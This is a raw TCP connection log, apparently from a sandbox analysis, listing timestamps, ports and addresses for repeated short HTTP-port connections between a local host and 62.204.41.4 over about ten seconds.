Feb 7, 2023 20:02:48.443540096 CET	50128	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.444309950 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.504827023 CET	80	50129	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.504863977 CET	80	50128	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.505059958 CET	50128	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.505068064 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.528501034 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.589051008 CET	80	50129	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.591860056 CET	80	50129	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.592051983 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.788528919 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.789659023 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.849100113 CET	80	50129	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.849343061 CET	50129	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.851871967 CET	80	50130	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.852117062 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.878882885 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:48.941363096 CET	80	50130	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.944351912 CET	80	50130	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:48.944580078 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.736287117 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.737541914 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.798934937 CET	80	50131	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:50.798965931 CET	80	50130	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:50.799233913 CET	50130	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.801750898 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.831578970 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:50.893167973 CET	80	50131	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:50.898102045 CET	80	50131	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:50.898329973 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.062650919 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.063432932 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.124150038 CET	80	50132	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.124182940 CET	80	50131	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.124382973 CET	50131	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.125720978 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.157887936 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.219290972 CET	80	50132	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.223545074 CET	80	50132	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.223846912 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.370217085 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.371045113 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.430841923 CET	80	50132	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.430959940 CET	50132	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.433315992 CET	80	50133	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.433512926 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.437304974 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.500262022 CET	80	50133	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.502486944 CET	80	50133	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.502629995 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.604991913 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.605845928 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.666363955 CET	80	50134	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.666744947 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.667443991 CET	80	50133	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.667515993 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.667587996 CET	50133	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.727847099 CET	80	50134	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.730381012 CET	80	50134	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.730556011 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.842036009 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.843167067 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.902513027 CET	80	50135	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.902551889 CET	80	50134	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.902709961 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.902749062 CET	50134	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.914333105 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:51.973733902 CET	80	50135	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.976408958 CET	80	50135	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:51.976588964 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.092509985 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.093693018 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.152106047 CET	80	50135	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.152605057 CET	50135	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.154179096 CET	80	50136	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.154365063 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.154927969 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.215542078 CET	80	50136	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.219247103 CET	80	50136	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.221927881 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.349446058 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.350267887 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.410490036 CET	80	50136	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.410598993 CET	50136	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.410671949 CET	80	50137	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.410809994 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.411571980 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.472825050 CET	80	50137	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.481930971 CET	80	50137	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.484561920 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.605668068 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.606908083 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.666204929 CET	80	50137	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.668724060 CET	50137	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.669259071 CET	80	50138	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.674058914 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.674592018 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.737039089 CET	80	50138	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.740448952 CET	80	50138	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.740684986 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.859308958 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.860461950 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.920986891 CET	80	50139	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.921425104 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.921865940 CET	80	50138	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.924158096 CET	50138	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.924797058 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:52.985148907 CET	80	50139	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.988130093 CET	80	50139	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:52.988497019 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.105648994 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.106549978 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.166054964 CET	80	50139	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.166299105 CET	50139	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.166778088 CET	80	50140	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.166898966 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.167783022 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.228293896 CET	80	50140	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.232999086 CET	80	50140	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.233203888 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.338872910 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.339833975 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.399404049 CET	80	50140	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.399595976 CET	50140	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.400083065 CET	80	50141	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.400228977 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.400943041 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.461155891 CET	80	50141	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.464102983 CET	80	50141	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.464224100 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.573314905 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.574506044 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.633651972 CET	80	50141	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.633789062 CET	50141	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.635951042 CET	80	50142	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.636159897 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.636956930 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.698586941 CET	80	50142	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.700922966 CET	80	50142	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.701112032 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.810801029 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.811795950 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.872405052 CET	80	50142	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.872504950 CET	50142	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.872994900 CET	80	50143	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.873105049 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.873531103 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:53.934993982 CET	80	50143	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.937649012 CET	80	50143	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:53.937839031 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.048099041 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.048832893 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.109638929 CET	80	50143	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.109941006 CET	50143	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.111316919 CET	80	50144	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.111566067 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.112123966 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.174328089 CET	80	50144	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.178194046 CET	80	50144	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.178556919 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.293981075 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.295253038 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.355397940 CET	80	50145	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.355647087 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.356239080 CET	80	50144	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.356333017 CET	50144	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.357855082 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.420821905 CET	80	50145	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.420859098 CET	80	50145	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.421027899 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.561669111 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.562724113 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.622004032 CET	80	50145	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.622354984 CET	50145	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.624351978 CET	80	50146	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.624496937 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.625344038 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.686820984 CET	80	50146	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.691339016 CET	80	50146	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.691430092 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.809210062 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.810379028 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.870834112 CET	80	50146	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.871040106 CET	50146	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.872580051 CET	80	50147	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.872735977 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.873680115 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:54.936072111 CET	80	50147	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.939722061 CET	80	50147	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:54.939927101 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.046526909 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.047113895 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.109015942 CET	80	50147	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.109231949 CET	50147	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.109324932 CET	80	50148	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.109462976 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.124322891 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.187309980 CET	80	50148	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.191257000 CET	80	50148	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.191495895 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.319998980 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.320763111 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.384013891 CET	80	50149	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.384267092 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.384988070 CET	80	50148	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.385139942 CET	50148	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.389817953 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.452172995 CET	80	50149	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.454595089 CET	80	50149	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.454802990 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.558196068 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.559570074 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.618849039 CET	80	50150	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.618989944 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.619723082 CET	80	50149	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.619810104 CET	50149	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.620345116 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.679759979 CET	80	50150	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.682312965 CET	80	50150	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.682450056 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.794183969 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.795253992 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.853924990 CET	80	50150	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.854134083 CET	50150	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.855385065 CET	80	50151	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.855612040 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.858237982 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:55.918586969 CET	80	50151	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.921014071 CET	80	50151	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:55.921159983 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.027276993 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.028511047 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.087835073 CET	80	50151	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.088125944 CET	50151	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.089051008 CET	80	50152	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.089214087 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.096465111 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.157022953 CET	80	50152	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.160877943 CET	80	50152	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.161115885 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.278738976 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.279767036 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.339342117 CET	80	50152	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.340310097 CET	80	50153	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.340497017 CET	50152	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.340574980 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.341247082 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.401758909 CET	80	50153	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.404689074 CET	80	50153	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.406274080 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.512402058 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.513190031 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.573174000 CET	80	50153	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.573388100 CET	80	50154	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.573554039 CET	50153	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.573637962 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.574090004 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.634325981 CET	80	50154	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.637090921 CET	80	50154	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.640922070 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.747147083 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.748086929 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.807543993 CET	80	50154	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.807688951 CET	50154	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.808475971 CET	80	50155	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.812674046 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.813184023 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.873507023 CET	80	50155	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.876737118 CET	80	50155	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:56.876878023 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.980748892 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:56.981868982 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.041325092 CET	80	50155	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.041414022 CET	50155	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.043267965 CET	80	50156	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.043524981 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.043867111 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.105758905 CET	80	50156	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.110049009 CET	80	50156	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.110312939 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.220590115 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.221513033 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.282505989 CET	80	50156	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.282758951 CET	50156	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.283260107 CET	80	50157	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.283508062 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.285145044 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.346715927 CET	80	50157	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.349086046 CET	80	50157	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.349319935 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.465648890 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.466737032 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.527352095 CET	80	50157	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.527535915 CET	50157	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.528611898 CET	80	50158	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.528846025 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.529246092 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.591032028 CET	80	50158	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.593482971 CET	80	50158	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.593607903 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.702264071 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.703207970 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.763694048 CET	80	50159	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.763969898 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.763983011 CET	80	50158	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.764086008 CET	50158	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.764940977 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.825328112 CET	80	50159	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.828329086 CET	80	50159	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.828535080 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.935323954 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.937870026 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.995850086 CET	80	50159	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.996088028 CET	50159	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:57.999315977 CET	80	50160	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:57.999531984 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.000083923 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.062225103 CET	80	50160	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.066256046 CET	80	50160	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.066487074 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.184185982 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.185184002 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.249742985 CET	80	50161	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.249902964 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.250171900 CET	80	50160	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.250267029 CET	50160	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.254041910 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.315902948 CET	80	50161	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.319019079 CET	80	50161	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.319219112 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.433698893 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.434649944 CET	50162	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.494515896 CET	80	50161	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.494748116 CET	50161	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.495158911 CET	80	50162	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.495287895 CET	50162	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.501955032 CET	50162	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:58.562575102 CET	80	50162	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.565460920 CET	80	50162	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:58.565583944 CET	50162	80	192.168.2.6	62.204.41.4
